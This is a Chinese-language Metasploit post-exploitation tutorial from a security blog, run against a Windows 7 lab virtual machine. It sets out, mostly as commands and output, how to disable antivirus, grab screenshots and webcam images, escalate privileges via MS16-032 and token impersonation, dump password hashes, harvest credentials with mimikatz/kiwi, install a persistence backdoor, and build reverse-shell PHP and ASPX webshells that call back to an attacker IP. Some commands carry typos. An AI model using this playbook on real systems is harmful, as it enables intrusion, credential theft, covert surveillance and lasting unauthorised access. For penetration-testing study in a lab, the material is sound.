假设我们已经通过一系列的渗透测试得到了目标机的Meterpreter Shell
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
264 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
316 504 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
348 340 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
400 340 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
412 392 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
460 392 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
504 400 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
..................
meterpreter > getpid #查看当前进程
Current pid: 1124
meterpreter > migrate 2328 #进程迁移
[*] Migrating from 1124 to 2328...
[*] Migration completed successfully.
meterpreter > getpid #再次查看发现,确认成功迁移
Current pid: 2328
meterpreter > kill 1124 #杀死原来进程
Killing: 1124
[-] 1077: Operation failed: Access is denied.
meterpreter > run post/windows/manage/migrate
meterpreter > sysinfo #查看系统信息
Computer : BAJI-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > run post/windows/gather/checkvm #检查是否运行在虚拟机上
[*] Checking if BAJI-PC is a Virtual Machine ...
[+] This is a VMware Virtual Machine
meterpreter > idletime #检查是否在运行,并查看最近运行时间
User has been idle for: 9 mins 59 secs
meterpreter > getuid #查看已经渗透成功的用户名
Server username: baji-PC\baji
meterpreter > run post/windows/manage/killav #关闭目标机杀毒软件
[*] No target processes were found.
meterpreter > route #查看网络设置
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.160.2 10 11
127.0.0.0 255.0.0.0 127.0.0.1 306 1
127.0.0.1 255.255.255.255 127.0.0.1 306 1
127.255.255.255 255.255.255.255 127.0.0.1 306 1
192.168.160.0 255.255.255.0 192.168.160.132 266 11
192.168.160.132 255.255.255.255 192.168.160.132 266 11
192.168.160.255 255.255.255.255 192.168.160.132 266 11
224.0.0.0 240.0.0.0 127.0.0.1 306 1
224.0.0.0 240.0.0.0 192.168.160.132 266 11
255.255.255.255 255.255.255.255 127.0.0.1 306 1
255.255.255.255 255.255.255.255 192.168.160.132 266 11
No IPv6 routes were found.
meterpreter > run post/windows/gather/enum_logged_on_users #查看当前登录用户信息
[*] Running against session 1
Current Logged Users
====================
SID User
--- ----
S-1-5-21-1722394881-3080478103-2565725322-1001 baji-PC\baji
[+] Results saved in: /home/zhiji/.msf4/loot/20210212153318_default_192.168.160.132_host.users.activ_894639.txt
Recently Logged Users
=====================
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-1722394881-3080478103-2565725322-1001 C:\Users\baji
meterpreter > run post/windows/gather/enum_applications #查看当前运行的app应用程序
[*] Enumerating applications installed on BAJI-PC
Installed Applications
======================
Name Version
---- -------
Google Chrome 88.0.4324.150
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.20.27508 14.20.27508.1
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.20.27508 14.20.27508.1
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.20.27508 14.20.27508
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.20.27508 14.20.27508
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.20.27508 14.20.27508
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.20.27508 14.20.27508
Mozilla Firefox 85.0.1 (x86 zh-CN) 85.0.1
Mozilla Maintenance Service 85.0.1
VMware Tools 11.0.0.14549434
phpstudy集成环境 8.1.1.2
[+] Results stored in: /home/zhiji/.msf4/loot/20210212153406_default_192.168.160.132_host.application_671096.txt
meterpreter > run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户和密码
[*] Running against BAJI-PC on session 1
[*] The Host BAJI-PC is not configured to have AutoLogon password
meterpreter > load espia #加载Espia插件
Loading extension espia...Success.
meterpreter > screengrab #抓取当前屏幕截图
Screenshot saved to: /home/zhiji/桌面/AaCPrqTV.jpeg #路径
meterpreter > screenshot #也可抓取当前屏幕截图
Screenshot saved to: /home/zhiji/桌面/RTEXARvH.jpeg #路径
meterpreter > wbcam_list #查看目标机有没有摄像头
meterpreter > wbcam_snap #打开目标机摄像头并拍张照
meterpreter > wbcam_stream #开启直播模式
meterpreter > shell #进shell,exit命令退出
Process 2380 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Windows\system32>
meterpreter > run get_local_subnets #查看目标机子网
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.160.0/255.255.255.0
meterpreter > run autoroute -s 192.168.160.0/24 #添加路由
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...] [*] Adding a route to 192.168.160.0/255.255.255.0...
[+] Added route to 192.168.160.0/255.255.255.0 via 192.168.160.132 [*] Use the -p option to list all active routes
meterpreter > run autoroute -p #查看路由是否添加成功
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Active Routing Table
==================== Subnet Netmask Gateway
------ ------- -------
192.168.160.0 255.255.255.0 Session 1
pwd #查看当前处于目标机的那个目录
getlwd #查看当前本地目录
ls #列出所有目录
cd #切换目录
search -f*.txt -d c:\ #搜索C盘中所有的.txt文件
download c:\aa.txt /root #下载目标机1.txt到攻击机root目录下
upload /root/1.txt c:\ #上传文件到c
1、先通过getsystem命令提权,结果失败
meterpreter > getsystem
[-] 2001: Operation failed: This function is not supported on this system. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
2、利用WMIC命令列出已安装的补丁(这些输出的结果不能直接被利用的,使用的方式是去找提权的EXP,使用没有下列编号的EXP进行提权)
C:\Users\baji\Desktop>Wmic qfe get Caption,Description,HotFixID,InstalledOn
Wmic qfe get Caption,Description,HotFixID,InstalledOn
Caption Description HotFixID InstalledOn
http://support.microsoft.com/?kbid=2534111 Hotfix KB2534111 1/4/2021
http://support.microsoft.com/?kbid=2999226 Update KB2999226 1/4/2021
http://support.microsoft.com/?kbid=976902 Update KB976902 11/21/2010
3、首先把meterpreter转为后台执行,然后搜索提权的EXP漏洞,这里用MS16_032举例
seach ms16_032
use 1 #1:可用模块id
set session 1 #指定服务id
run
getuid #查看当前权限
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u #列出可用的token
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
baji-PC\Administrator
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
No tokens available
meterpreter > impersonate_token baji-PC\\Administrator #冒充上面的用户登录,注意这里主机名和用户名间是两反斜杠\\
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user baji-PC\Administrator
meterpreter > shell
Process 2152 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Users\Administrator\Desktop>whoami #查看当前用户
whoami
baji-pc\administrator
C:\Users\Administrator\Desktop>
使用hashdump抓取密码,hashdump meterpreter脚本可以从目标机提取hash值,破解hash值就可获得登录密码
meterpreter > getsystem #在上面的提权后就可以使用这一命令进一步提权了
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > hashdump #hashdump命令的执行必须要system权限,并且目标机没有开启UAC
[-] 2007: Operation failed: The parameter is incorrect.
面对上面的问题这里我们使用另一个更加强大的模块smart_hashdump,不仅可以导出所有用户的hash,而且可以绕过UAC
meterpreter > run windows/gather/smart_hashdump
[*] Running module against BAJI-PC
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /home/zhiji/.msf4/loot/20210213214048_default_192.168.160.132_windows.hashes_515778.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY be81bb778283c994c7c2ebafd8f51b04...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[+] baji:"1"
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:69943c5e63b4d2c104dbbcc15138b72b:::
[+] baji:1001:aad3b435b51404eeaad3b435b51404ee:69943c5e63b4d2c104dbbcc15138b72b:::
[+] HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:59c8c6d121b9a6b2cc21bade49bfe630:::
meterpreter >
使用kiwi抓取密码-------旧版本的mimikatz已被该模块取代,该模块更加强大
kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。如果目标系统是32位的,则没有这个限制。
meterpreter > getpid #我的目标机是64位,所有先迁移一下进程
Current pid: 2336
meterpreter > migrate 2528
[*] Migrating from 2336 to 2528...
[*] Migration completed successfully.
meterpreter > getpid #迁移成功
Current pid: 2528
meterpreter > load mimikatz #加载mimikatz模块,这里提示我已被wiki取代请以后都用wiki(手动狗头)
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > help kiwi #查看帮助
Kiwi Commands
=============
Command Description
------- -----------
creds_all #列举所有凭据/所有的系统密码
creds_kerberos #列举所有kerberos凭据
creds_msv #列举所有msv凭据
creds_ssp #列举所有ssp凭据
creds_tspkg #列举所有tspkg凭据
creds_wdigest #列举所有wdigest凭据
dcsync #通过DCSync检索用户帐户信息
dcsync_ntlm #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create #创建黄金票据
kerberos_ticket_list #列举kerberos票据
kerberos_ticket_purge #清除kerberos票据
kerberos_ticket_use #使用kerberos票据
kiwi_cmd #kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令
lsa_dump_sam #dump出lsa的SAM
lsa_dump_secrets #dump出lsa的密文
password_change #修改密码
wifi_list #列出当前用户的wifi配置文件
wifi_list_shared #列出共享wifi配置文件/编码
persistence是一款使用安装自启动方式的持久性后门程序,可以利用它创建注册和文件。启动时会触发杀毒软件,建议运行时关闭杀毒软件
run persistence -A -S -u -i 60 -P 4321 -r 192.168.160.132
A #自动启动payload程序
S #系统启动时自动加载
U #用户登录时自动启动
X #机时自动挂载
i #连时的时间间隔
P #听反向连接端口号
r #标机器IP地址
sessions #查看已经成功获取的会话
metasploit中,有一个名为PHP Meterpreter的payload,利用该模块可以创建具有meterpreter功能PHP Webshell
使用msfvrenom工具制作webshell.php
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.160.129 -f raw > /1.php
-p用于参与payload -f用于设置输出文件格式
将1.php上传到目标服务器,这里直接复制到/var/www/html目录下
接着启动msfconsole,使用以下命令设置监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.160.129
run
目标机访问http://127.0.0.1/1.php,反弹成功
metasploit下名为shell_reverse_tcp的payload,利用这个模块可创建具有meterpreter功能的各版本webshell
show payloads
use windows/shell_reverse_tcp
info
set lhost 192.168.160.129
set lport 4444
sava
generate -t asp //生成asp版的shellcode
generate -t aspx //生成aspx版的shellcode
先把内容保存为aspx.aspx,再上传到目标服务器,然后启动msfconsole
use expoloit/mulit/handler
set payload windows/meterpreter/reversr_tcp
set Lhost 192.168.160.120
set lport 4444
run
反弹成功
欢迎关注公众号知己安全,原创不易,转载请注明来源【知己安全】
个人博客地址:www.zhiji.icu